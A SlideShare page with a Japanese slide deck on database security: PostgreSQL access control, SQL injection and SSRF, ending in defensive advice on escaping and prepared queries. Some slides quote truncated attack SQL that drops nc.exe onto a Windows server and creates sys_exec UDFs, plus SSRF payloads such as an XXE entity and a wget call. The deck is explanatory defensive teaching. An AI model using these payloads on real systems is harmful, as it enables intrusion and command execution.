SlideShare ist ein Scribd-Unternehmen logo

データベースセキュリティ

Als PPTX, PDF herunterladen
Yasuo Ohgaki
Yasuo Ohgaki

第一回 中国地方DB勉強会の資料

1 von 32
データベース セキュ リティ Yasuo Ohgaki / yohgaki@ohgaki.net
セキュリティの基本 データ アプリ ホスト ネット ワーク 多層防御 フェイルセーフ 入出力制御
アプリケーションセキュリティ 2013/07/08岡山Ruby会議2013 (C) Electronic Service Initiative, Ltd. 3 フレームワーク アプリ ライブラリ 外部システム ライブラリ 外部システム ライブラリ ライブラリ ライブラリ ライブラリ ライブラリ ライブラリ ライブラリ Webサービス Webサービス Webサービス ブラウザ ブラウザ ブラウザ ライブラリ ライブラリ ライブラリ 外部システム 外部システム 外部システム ライブラリ ライブラリ ライブラリ 外部システム 外部システム 外部システム Webサービス Webサービス Webサービス ブラウザ ブラウザ ブラウザ 初期状態ではアプリのみ
データベースセキュリティ • PostgreSQLの場合はpg_hba.conf 接続制御 • ロールベースアクセス制御 • DBオブジェクトへのアクセス制御 • 作成・利用・削除 • SE-PostgreSQL(行、コラムのアクセス制御) アクセス制御 • DB自体のセキュリティ データベース
接続と認証 ▪ pg_hda.conf ▪ データベースにアクセス可能なホストを設定 ▪ UNIXドメインとTCP接続 ▪ ローカルホストの場合、UNIXドメインの方が高速 ▪ 書式 local DATABASE USER METHOD [OPTION] host DATABASE USER CIDR-ADDRESS METHOD [OPTION] hostssl DATABASE USER CIDR-ADDRESS METHOD [OPTION] hostnossl DATABASE USER CIDR-ADDRESS METHOD [OPTION] 2007/6/5 5PostgreSQL Conference 2007
権限 ▪ 権限管理は8.0からロールベース ▪ DBオブジェクトに対して権限を設定可能 ▪ Webアプリケーションには不必要な権限を与えない ▪ 公開サイトで参照のみ可能なWebアプリケーションならDBユー ザはSELECT権限のみ与える ▪ 削除が不必要ならDELETE権限は与えない CREATE USER name は CREATE ROLE name LOGIN と同等 SELECT, INSERT, UPDATE, DELETE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, USAGE 2007/6/5 6PostgreSQL Conference 2007
データベースセキュリティはほぼアプリ任 せ • データベース最大の脅威 • DBAには対策なし • 緩和策は可能 SQLインジェクション • 最小権限原則の実施 • 例:読み込み専用接続、テーブルアクセス権設定、 SELinux • SSRF(後述)を考慮した構成 緩和策 • SQLインジェクション脆弱性を排除 根本的な対策はアプリ
SQLインジェクションの種類と攻撃 直接SQLインジェクション • 直接攻撃SQL文に挿入 間接SQLインジェクション • 間接的に攻撃SQL文を挿入 ブラインドSQLインジェクション • データベース解析 • 参考:sqlmap ファイルの取得・設置 • 多くのデータベースはファイルへのアクセスを許す 任意コマンド実行 • DBによってはコマンド実行可能(UDFインジェクション) SSRF • PostgreSQL
PostgreSQLでのコマンド配置例 ▪ 他のDBでもSQL文からファイル操作が可能 CREATE TABLE footable(data text); INSERT INTO footable(data) VALUES ('TVqQ…'); UPDATE footable SET data=data||'U8pp…vgDw'; […] SELECT lo_create(47); UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM footable), 'base64')) WHERE loid=47; SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe'); 出典:Advanced SQL injection to operating system full control
MySQLでのコマンドの配置例 ▪ MySQLでももちろん可能 CREATE TABLE footable(data longblob); INSERT INTO footable(data) VALUES (0x4d5a90…610000); UPDATE footable SET data=CONCAT(data, 0xaa270000…000000); […]; SELECT data FROM footable INTO DUMPFILE 'C:/WINDOWS/Temp/nc.exe'; 出典:Advanced SQL injection to operating system full control
UDFインジェクション ▪ PostgreSQLの例 CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'libudflenpx.dll', 'sys_exec' LANGUAGE C […]; CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'libudflenpx.dll', 'sys_eval' LANGUAGE C […]; 出典:Advanced SQL injection to operating system full control
UDFインジェクション ▪ もちろんMySQLもOK CREATE FUNCTION sys_exec RETURNS int SONAME 'libudffmwgj.dll'; CREATE FUNCTION sys_eval RETURNS string SONAME 'libudffmwgj.dll'; 出典:Advanced SQL injection to operating system full control
SSRF攻撃 ▪ SSRFにXXE、SQL・OSコマンド・スクリプトインジェク ションなどを利用し企業内ネットワークの奥深くまで攻撃 Electronic Service Initiative, Ltd. 13 SSRFは内部ネットワークから攻撃する クラシックな攻撃パターンだが研究者は インターネットから攻撃する手法を考案 ※XXE – XML External Entityを利用した攻撃
SSRF攻撃とは ▪ SSRF = Server Side Request Forgery ▪ リクエストAをサービスAに送信 ▪ サービスAはリクエストBをサービスBに送信 ▪ リクエストBの幾つかフィールドをリクエストAで操作可能 A1 A2 A3 リクエスト A サービス A Electronic Service Initiative, Ltd. 14 B1 A1 A3 B2 サービス B リクエスト B 攻撃
SSRF攻撃の手法 Electronic Service Initiative, Ltd. 15 単純なリクエスト /ui/BufferOverview?server=172.16.1.1&port=31337&dispatcher=&target= XXE <!ENTITY xxe SYSTEM “http://172.16.1.1:80/someservice”> SQLインジェクション SELECT * FROM OPENQUERY(HostB, „SELECT * FROM @@version‟) (MS SQL) SELECT * FROM myTable@HostB (Oracle) SELECT dblink_send_query('host=127.0.0.1 dbname=HostB user='attacker' ','select version();') (PostgreSQL) OSコマンド system(„wget http://172.16.1.1/someservie‟) 攻撃
SSRF攻撃 ▪ XXEで可能と紹介されている例 ▪ ファイルとディレクトリへのアクセス ▪ リモートポートスキャン ▪ 他のシステムをHTTPで攻撃 ▪ HTTP以外のプロトコルで他のシステムを攻撃 ▪ PHPのXXE修正 ▪ SOAP - Disabled external entities loading (CVE-2013-1643, CVE-2013-1824) 2013年3月 PHP5.4.13/5.3.23 ▪ PostgreSQLの場合、構成によりさまざまなSSRF攻撃が可 能 Electronic Service Initiative, Ltd. 16
SSRF攻撃 SSRFはコマンドやリクエストを実行できる脆弱性がある場 合、実行可能 XXE、SQLインジェクション、OSコマンドインジェクショ ン、スクリプト実行 Electronic Service Initiative, Ltd. 17
SSRFとデータベース • FDW!(Foreign Data Wrapper) • DBLink! 例えばPostgreSQLの場合 • Oracle, MySQL, MS SQL, ODBC, JDBC, Informix, CouchDB, Mongo, Redis, Neo4J, File, LDAP, etc PostgreSQLのFDW
SQLインジェクション 対策
SQLインジェクション脆弱性 • 非常に簡単 攻撃の容易さ • 非常に危険 攻撃の危険性 • とても簡単 修正の難易度 簡単なのに無くならない!
なぜ無くならないのか? 対策の基本思想が間違っている事が原因 • API(プリペアードクエリ、プレイスホルダ)を使えば大丈夫! • バリデーションすれば大丈夫! この思想が間違い
出力制御の基本 エスケープ API利用 バリデーション 出力先の種別を問わず 基本は同じ
出力先の入力仕様を知る データベースに限らず、何かに出力する場 合、出力先の入力仕様を知ることが必須
SQL文の入力仕様 • エスケープ PQescapeLiteral パラメータ • エスケープ PQescapeIdentifier 識別子 • バリデーション APIなし SQL語句
プリペアードクエリの入力仕様 • プレイスホルダ エスケープなし パラメータ • エスケープ PQescapeIdentifier 識別子 • バリデーション APIなし SQL語句
よくあるSQLインジェクション脆弱性 識別子が埋め込まれている INクエリなど可変長のパラメータを埋め込み 整数値などが整数値だと思い込んで埋め込み SQL語句(DESCなど)だから大丈夫と信じ て埋め込み
脆弱性を作る根本的原因 出力先の入力仕様を知らない APIの制限を知らない
原因と対策 原因: 入力仕様、API制限を知らない 対策:入力仕様を知る • API制限もAPIの入力仕様
入力仕様を知る最適な方法 エスケープ仕様を知る
出力制御の基本 エスケープ API利用 バリデーション 出力先の種別を問わず 基本は同じ
まとめ
SQLインジェクション対策まとめ SQLインジェクション対策は簡単! 誤った思想が「簡単な脆弱性」を蔓延させる 出力先の入力仕様を知ることが最大のセキュリティ対策 APIは万能ではない 出力先に対するセキュリティ対策はすべて共通 • エスケープ > API利用 > バリデーション ただし実際にアプリを作る場合は、 • API利用 > エスケープ > バリデーション でOK 今日から脆弱性フリーのコーディング!

Empfohlen

Postgre SQL security_20170412
Postgre SQL security_20170412Postgre SQL security_20170412
Postgre SQL security_20170412Kazuki Omo
 
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システム
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システムWiki と携帯型遠隔操作機器を使った情報セキュリティ対策システム
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システムTakashi Yamanoue
 
OSC 2014 Tokyo/Spring 「Zabbix 2.2を使ってみよう」
OSC 2014 Tokyo/Spring 「Zabbix 2.2を使ってみよう」OSC 2014 Tokyo/Spring 「Zabbix 2.2を使ってみよう」
OSC 2014 Tokyo/Spring 「Zabbix 2.2を使ってみよう」Atsushi Tanaka
 
ZabbixによるOpenStack/OpenContrailの監視
ZabbixによるOpenStack/OpenContrailの監視ZabbixによるOpenStack/OpenContrailの監視
ZabbixによるOpenStack/OpenContrailの監視Kodai Terashima
 
自宅ラック勉強会 2.2 夏のZabbix特別教室 ~構築編~
自宅ラック勉強会 2.2 夏のZabbix特別教室 ~構築編~自宅ラック勉強会 2.2 夏のZabbix特別教室 ~構築編~
自宅ラック勉強会 2.2 夏のZabbix特別教室 ~構築編~真乙 九龍
 
Zabbix-jp study #4 20111020 session2
Zabbix-jp study #4 20111020 session2Zabbix-jp study #4 20111020 session2
Zabbix-jp study #4 20111020 session2Hitoshi Yoshida
 
とある診断員とSQLインジェクション
とある診断員とSQLインジェクションとある診断員とSQLインジェクション
とある診断員とSQLインジェクションzaki4649
 
Zabbix 4.0のご紹介 @OSC 2018 Tokyo/Fall
Zabbix 4.0のご紹介 @OSC 2018 Tokyo/FallZabbix 4.0のご紹介 @OSC 2018 Tokyo/Fall
Zabbix 4.0のご紹介 @OSC 2018 Tokyo/FallAtsushi Tanaka
 

Empfohlen

Postgre SQL security_20170412
Postgre SQL security_20170412Postgre SQL security_20170412
Postgre SQL security_20170412Kazuki Omo
 
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システム
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システムWiki と携帯型遠隔操作機器を使った情報セキュリティ対策システム
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システムTakashi Yamanoue
 
OSC 2014 Tokyo/Spring 「Zabbix 2.2を使ってみよう」
OSC 2014 Tokyo/Spring 「Zabbix 2.2を使ってみよう」OSC 2014 Tokyo/Spring 「Zabbix 2.2を使ってみよう」
OSC 2014 Tokyo/Spring 「Zabbix 2.2を使ってみよう」Atsushi Tanaka
 
ZabbixによるOpenStack/OpenContrailの監視
ZabbixによるOpenStack/OpenContrailの監視ZabbixによるOpenStack/OpenContrailの監視
ZabbixによるOpenStack/OpenContrailの監視Kodai Terashima
 
自宅ラック勉強会 2.2 夏のZabbix特別教室 ~構築編~
自宅ラック勉強会 2.2 夏のZabbix特別教室 ~構築編~自宅ラック勉強会 2.2 夏のZabbix特別教室 ~構築編~
自宅ラック勉強会 2.2 夏のZabbix特別教室 ~構築編~真乙 九龍
 
Zabbix-jp study #4 20111020 session2
Zabbix-jp study #4 20111020 session2Zabbix-jp study #4 20111020 session2
Zabbix-jp study #4 20111020 session2Hitoshi Yoshida
 
とある診断員とSQLインジェクション
とある診断員とSQLインジェクションとある診断員とSQLインジェクション
とある診断員とSQLインジェクションzaki4649
 
Zabbix 4.0のご紹介 @OSC 2018 Tokyo/Fall
Zabbix 4.0のご紹介 @OSC 2018 Tokyo/FallZabbix 4.0のご紹介 @OSC 2018 Tokyo/Fall
Zabbix 4.0のご紹介 @OSC 2018 Tokyo/FallAtsushi Tanaka
 
ReDos検出プログラムの作成とOSSへの適用 #seccamp
ReDos検出プログラムの作成とOSSへの適用 #seccampReDos検出プログラムの作成とOSSへの適用 #seccamp
ReDos検出プログラムの作成とOSSへの適用 #seccampYujiro Yahata
 
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/FallZabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/FallAtsushi Tanaka
 
ReDosトラック内発表資料
ReDosトラック内発表資料ReDosトラック内発表資料
ReDosトラック内発表資料Yujiro Yahata
 
統合監視ソフトウェア Zabbix新バージョン2.0の紹介
統合監視ソフトウェア Zabbix新バージョン2.0の紹介統合監視ソフトウェア Zabbix新バージョン2.0の紹介
統合監視ソフトウェア Zabbix新バージョン2.0の紹介takanori suzuki
 
Owasp top10 HandsOn
Owasp top10 HandsOnOwasp top10 HandsOn
Owasp top10 HandsOnmasafumi masutani
 
Windows Phone で Active Directory 認証 2011.12.1版
Windows Phone で Active Directory 認証 2011.12.1版Windows Phone で Active Directory 認証 2011.12.1版
Windows Phone で Active Directory 認証 2011.12.1版junichi anno
 
Androidにおける強制アクセス制御
Androidにおける強制アクセス制御Androidにおける強制アクセス制御
Androidにおける強制アクセス制御Hiromu Yakura
 
オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介OSSラボ株式会社
 
Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~
Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~
Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~ShuheiUda
 
Zabbixをもっと便利に!安全に!
Zabbixをもっと便利に!安全に!Zabbixをもっと便利に!安全に!
Zabbixをもっと便利に!安全に!Takashi Matsunaga
 
20061122
2006112220061122
20061122小野 修司
 
AWSインスタンス設定手順書
AWSインスタンス設定手順書AWSインスタンス設定手順書
AWSインスタンス設定手順書iret, Inc.
 
ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎Takahisa Kishiya
 
Active Directory 侵害と推奨対策
Active Directory 侵害と推奨対策Active Directory 侵害と推奨対策
Active Directory 侵害と推奨対策Yurika Kakiuchi
 
Webアプリケーション脆弱性体験ハンズオン
Webアプリケーション脆弱性体験ハンズオンWebアプリケーション脆弱性体験ハンズオン
Webアプリケーション脆弱性体験ハンズオンYuichi Hattori
 
BPStudy20121221
BPStudy20121221BPStudy20121221
BPStudy20121221Shinichiro Takezaki
 
Webアプリのセキュリティ対策入門(仮)
Webアプリのセキュリティ対策入門(仮)Webアプリのセキュリティ対策入門(仮)
Webアプリのセキュリティ対策入門(仮)pinenet
 
CleanArchitecture with AssemblyDefinition in unity
CleanArchitecture with AssemblyDefinition in unityCleanArchitecture with AssemblyDefinition in unity
CleanArchitecture with AssemblyDefinition in unityNakanoYosuke1
 
20180216 sapporo techbar_db_migration
20180216 sapporo techbar_db_migration20180216 sapporo techbar_db_migration
20180216 sapporo techbar_db_migrationInsight Technology, Inc.
 
2011/12/3 わんくま同盟
2011/12/3 わんくま同盟2011/12/3 わんくま同盟
2011/12/3 わんくま同盟貴仁 大和屋
 
Sql azure入門
Sql azure入門Sql azure入門
Sql azure入門貴仁 大和屋
 
『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説
『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説
『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説Daisuke Nishino
 

Weitere ähnliche Inhalte

Was ist angesagt?

ReDos検出プログラムの作成とOSSへの適用 #seccamp
ReDos検出プログラムの作成とOSSへの適用 #seccampReDos検出プログラムの作成とOSSへの適用 #seccamp
ReDos検出プログラムの作成とOSSへの適用 #seccampYujiro Yahata
 
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/FallZabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/FallAtsushi Tanaka
 
ReDosトラック内発表資料
ReDosトラック内発表資料ReDosトラック内発表資料
ReDosトラック内発表資料Yujiro Yahata
 
統合監視ソフトウェア Zabbix新バージョン2.0の紹介
統合監視ソフトウェア Zabbix新バージョン2.0の紹介統合監視ソフトウェア Zabbix新バージョン2.0の紹介
統合監視ソフトウェア Zabbix新バージョン2.0の紹介takanori suzuki
 
Windows Phone で Active Directory 認証 2011.12.1版
Windows Phone で Active Directory 認証 2011.12.1版Windows Phone で Active Directory 認証 2011.12.1版
Windows Phone で Active Directory 認証 2011.12.1版junichi anno
 
Androidにおける強制アクセス制御
Androidにおける強制アクセス制御Androidにおける強制アクセス制御
Androidにおける強制アクセス制御Hiromu Yakura
 
オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介OSSラボ株式会社
 
Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~
Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~
Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~ShuheiUda
 
Zabbixをもっと便利に!安全に!
Zabbixをもっと便利に!安全に!Zabbixをもっと便利に!安全に!
Zabbixをもっと便利に!安全に!Takashi Matsunaga
 
AWSインスタンス設定手順書
AWSインスタンス設定手順書AWSインスタンス設定手順書
AWSインスタンス設定手順書iret, Inc.
 

Was ist angesagt? (12)

ReDos検出プログラムの作成とOSSへの適用 #seccamp
ReDos検出プログラムの作成とOSSへの適用 #seccampReDos検出プログラムの作成とOSSへの適用 #seccamp
ReDos検出プログラムの作成とOSSへの適用 #seccamp
 
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/FallZabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
 
ReDosトラック内発表資料
ReDosトラック内発表資料ReDosトラック内発表資料
ReDosトラック内発表資料
 
統合監視ソフトウェア Zabbix新バージョン2.0の紹介
統合監視ソフトウェア Zabbix新バージョン2.0の紹介統合監視ソフトウェア Zabbix新バージョン2.0の紹介
統合監視ソフトウェア Zabbix新バージョン2.0の紹介
 
Owasp top10 HandsOn
Owasp top10 HandsOnOwasp top10 HandsOn
Owasp top10 HandsOn
 
Windows Phone で Active Directory 認証 2011.12.1版
Windows Phone で Active Directory 認証 2011.12.1版Windows Phone で Active Directory 認証 2011.12.1版
Windows Phone で Active Directory 認証 2011.12.1版
 
Androidにおける強制アクセス制御
Androidにおける強制アクセス制御Androidにおける強制アクセス制御
Androidにおける強制アクセス制御
 
オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介
 
Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~
Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~
Azure サポート エンジニア直伝 ~ PowerShell 実践活用術 ~
 
Zabbixをもっと便利に!安全に!
Zabbixをもっと便利に!安全に!Zabbixをもっと便利に!安全に!
Zabbixをもっと便利に!安全に!
 
20061122
2006112220061122
20061122
 
AWSインスタンス設定手順書
AWSインスタンス設定手順書AWSインスタンス設定手順書
AWSインスタンス設定手順書
 

Ähnlich wie データベースセキュリティ

ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎Takahisa Kishiya
 
Active Directory 侵害と推奨対策
Active Directory 侵害と推奨対策Active Directory 侵害と推奨対策
Active Directory 侵害と推奨対策Yurika Kakiuchi
 
Webアプリケーション脆弱性体験ハンズオン
Webアプリケーション脆弱性体験ハンズオンWebアプリケーション脆弱性体験ハンズオン
Webアプリケーション脆弱性体験ハンズオンYuichi Hattori
 
Webアプリのセキュリティ対策入門(仮)
Webアプリのセキュリティ対策入門(仮)Webアプリのセキュリティ対策入門(仮)
Webアプリのセキュリティ対策入門(仮)pinenet
 
CleanArchitecture with AssemblyDefinition in unity
CleanArchitecture with AssemblyDefinition in unityCleanArchitecture with AssemblyDefinition in unity
CleanArchitecture with AssemblyDefinition in unityNakanoYosuke1
 
2011/12/3 わんくま同盟
2011/12/3 わんくま同盟2011/12/3 わんくま同盟
2011/12/3 わんくま同盟貴仁 大和屋
 
『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説
『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説
『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説Daisuke Nishino
 
ネットワーク構成から考える AWS IaaS 管理
ネットワーク構成から考える AWS IaaS 管理ネットワーク構成から考える AWS IaaS 管理
ネットワーク構成から考える AWS IaaS 管理Hideaki Aoyagi
 
アプリケーションのシフトレフトを実践するには
アプリケーションのシフトレフトを実践するにはアプリケーションのシフトレフトを実践するには
アプリケーションのシフトレフトを実践するにはRiotaro OKADA
 
20200414 Advanced Features in Amazon Elasticsearch Service
20200414 Advanced Features in Amazon Elasticsearch Service20200414 Advanced Features in Amazon Elasticsearch Service
20200414 Advanced Features in Amazon Elasticsearch ServiceAmazon Web Services Japan
 
第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティー第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティーhakoika-itwg
 
Microsoft Azure ~ Web開発 & モバイル開発者向け情報 ~
Microsoft Azure ~ Web開発 & モバイル開発者向け情報 ~ Microsoft Azure ~ Web開発 & モバイル開発者向け情報 ~
Microsoft Azure ~ Web開発 & モバイル開発者向け情報 ~ Daisuke Masubuchi
 
すぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTipsすぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTipsyoshinori matsumoto
 
Data Factory V2 新機能徹底活用入門
Data Factory V2 新機能徹底活用入門Data Factory V2 新機能徹底活用入門
Data Factory V2 新機能徹底活用入門Keisuke Fujikawa
 
Java/Androidセキュアコーディング
Java/AndroidセキュアコーディングJava/Androidセキュアコーディング
Java/AndroidセキュアコーディングMasaki Kubo
 
SoftLayer Bluemix Summit 2015 はじめてのSoftLayer(サーバー、ストレージ編)
SoftLayer Bluemix Summit 2015 はじめてのSoftLayer(サーバー、ストレージ編) SoftLayer Bluemix Summit 2015 はじめてのSoftLayer(サーバー、ストレージ編)
SoftLayer Bluemix Summit 2015 はじめてのSoftLayer(サーバー、ストレージ編)Yuichi Tamagawa
 

Ähnlich wie データベースセキュリティ (20)

ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎
 
Active Directory 侵害と推奨対策
Active Directory 侵害と推奨対策Active Directory 侵害と推奨対策
Active Directory 侵害と推奨対策
 
Webアプリケーション脆弱性体験ハンズオン
Webアプリケーション脆弱性体験ハンズオンWebアプリケーション脆弱性体験ハンズオン
Webアプリケーション脆弱性体験ハンズオン
 
BPStudy20121221
BPStudy20121221BPStudy20121221
BPStudy20121221
 
Webアプリのセキュリティ対策入門(仮)
Webアプリのセキュリティ対策入門(仮)Webアプリのセキュリティ対策入門(仮)
Webアプリのセキュリティ対策入門(仮)
 
CleanArchitecture with AssemblyDefinition in unity
CleanArchitecture with AssemblyDefinition in unityCleanArchitecture with AssemblyDefinition in unity
CleanArchitecture with AssemblyDefinition in unity
 
20180216 sapporo techbar_db_migration
20180216 sapporo techbar_db_migration20180216 sapporo techbar_db_migration
20180216 sapporo techbar_db_migration
 
2011/12/3 わんくま同盟
2011/12/3 わんくま同盟2011/12/3 わんくま同盟
2011/12/3 わんくま同盟
 
Sql azure入門
Sql azure入門Sql azure入門
Sql azure入門
 
『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説
『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説
『これからの.NETアプリケーション開発』セミナー .NET用アプリケーション フレームワーク Open 棟梁 概説
 
ネットワーク構成から考える AWS IaaS 管理
ネットワーク構成から考える AWS IaaS 管理ネットワーク構成から考える AWS IaaS 管理
ネットワーク構成から考える AWS IaaS 管理
 
アプリケーションのシフトレフトを実践するには
アプリケーションのシフトレフトを実践するにはアプリケーションのシフトレフトを実践するには
アプリケーションのシフトレフトを実践するには
 
2011/11/26 Dot netlab
2011/11/26 Dot netlab2011/11/26 Dot netlab
2011/11/26 Dot netlab
 
20200414 Advanced Features in Amazon Elasticsearch Service
20200414 Advanced Features in Amazon Elasticsearch Service20200414 Advanced Features in Amazon Elasticsearch Service
20200414 Advanced Features in Amazon Elasticsearch Service
 
第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティー第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティー
 
Microsoft Azure ~ Web開発 & モバイル開発者向け情報 ~
Microsoft Azure ~ Web開発 & モバイル開発者向け情報 ~ Microsoft Azure ~ Web開発 & モバイル開発者向け情報 ~
Microsoft Azure ~ Web開発 & モバイル開発者向け情報 ~
 
すぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTipsすぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTips
 
Data Factory V2 新機能徹底活用入門
Data Factory V2 新機能徹底活用入門Data Factory V2 新機能徹底活用入門
Data Factory V2 新機能徹底活用入門
 
Java/Androidセキュアコーディング
Java/AndroidセキュアコーディングJava/Androidセキュアコーディング
Java/Androidセキュアコーディング
 
SoftLayer Bluemix Summit 2015 はじめてのSoftLayer(サーバー、ストレージ編)
SoftLayer Bluemix Summit 2015 はじめてのSoftLayer(サーバー、ストレージ編) SoftLayer Bluemix Summit 2015 はじめてのSoftLayer(サーバー、ストレージ編)
SoftLayer Bluemix Summit 2015 はじめてのSoftLayer(サーバー、ストレージ編)
 

Mehr von Yasuo Ohgaki

忘れられているデータセキュリティ
忘れられているデータセキュリティ忘れられているデータセキュリティ
忘れられているデータセキュリティYasuo Ohgaki
 
ネットワークから学ぶソフトウェアセキュリティの基礎
ネットワークから学ぶソフトウェアセキュリティの基礎ネットワークから学ぶソフトウェアセキュリティの基礎
ネットワークから学ぶソフトウェアセキュリティの基礎Yasuo Ohgaki
 
5分で解るセキュアコーディング
5分で解るセキュアコーディング5分で解るセキュアコーディング
5分で解るセキュアコーディングYasuo Ohgaki
 
アプリ開発者に大きな影響 2017年版OWASP TOP 10
アプリ開発者に大きな影響 2017年版OWASP TOP 10 アプリ開発者に大きな影響 2017年版OWASP TOP 10
アプリ開発者に大きな影響 2017年版OWASP TOP 10 Yasuo Ohgaki
 
SQLインジェクション総”習”編
SQLインジェクション総”習”編SQLインジェクション総”習”編
SQLインジェクション総”習”編Yasuo Ohgaki
 
PHP5.6からPHP7.0への移行
PHP5.6からPHP7.0への移行PHP5.6からPHP7.0への移行
PHP5.6からPHP7.0への移行Yasuo Ohgaki
 
ソースコード検査に耐えるコードとは?
ソースコード検査に耐えるコードとは?ソースコード検査に耐えるコードとは?
ソースコード検査に耐えるコードとは?Yasuo Ohgaki
 
経営者・マネージャーが知るべき情報セキュリティ
経営者・マネージャーが知るべき情報セキュリティ経営者・マネージャーが知るべき情報セキュリティ
経営者・マネージャーが知るべき情報セキュリティYasuo Ohgaki
 
セキュアなソフトウェアアーキテクチャー
セキュアなソフトウェアアーキテクチャーセキュアなソフトウェアアーキテクチャー
セキュアなソフトウェアアーキテクチャーYasuo Ohgaki
 
PHPにないセキュリティ機能
PHPにないセキュリティ機能PHPにないセキュリティ機能
PHPにないセキュリティ機能Yasuo Ohgaki
 
PHPにないセキュリティ機能
PHPにないセキュリティ機能PHPにないセキュリティ機能
PHPにないセキュリティ機能Yasuo Ohgaki
 
PHPにないセキュリティ機能
PHPにないセキュリティ機能PHPにないセキュリティ機能
PHPにないセキュリティ機能Yasuo Ohgaki
 
PHPカンファレンス2014セキュリティ対談資料
PHPカンファレンス2014セキュリティ対談資料PHPカンファレンス2014セキュリティ対談資料
PHPカンファレンス2014セキュリティ対談資料Yasuo Ohgaki
 
Web担当者が知っておくべきPHPとセキュリティ
Web担当者が知っておくべきPHPとセキュリティWeb担当者が知っておくべきPHPとセキュリティ
Web担当者が知っておくべきPHPとセキュリティYasuo Ohgaki
 
Postgre SQL 9.3 新機能
Postgre SQL 9.3 新機能Postgre SQL 9.3 新機能
Postgre SQL 9.3 新機能Yasuo Ohgaki
 

Mehr von Yasuo Ohgaki (16)

忘れられているデータセキュリティ
忘れられているデータセキュリティ忘れられているデータセキュリティ
忘れられているデータセキュリティ
 
ネットワークから学ぶソフトウェアセキュリティの基礎
ネットワークから学ぶソフトウェアセキュリティの基礎ネットワークから学ぶソフトウェアセキュリティの基礎
ネットワークから学ぶソフトウェアセキュリティの基礎
 
5分で解るセキュアコーディング
5分で解るセキュアコーディング5分で解るセキュアコーディング
5分で解るセキュアコーディング
 
アプリ開発者に大きな影響 2017年版OWASP TOP 10
アプリ開発者に大きな影響 2017年版OWASP TOP 10 アプリ開発者に大きな影響 2017年版OWASP TOP 10
アプリ開発者に大きな影響 2017年版OWASP TOP 10
 
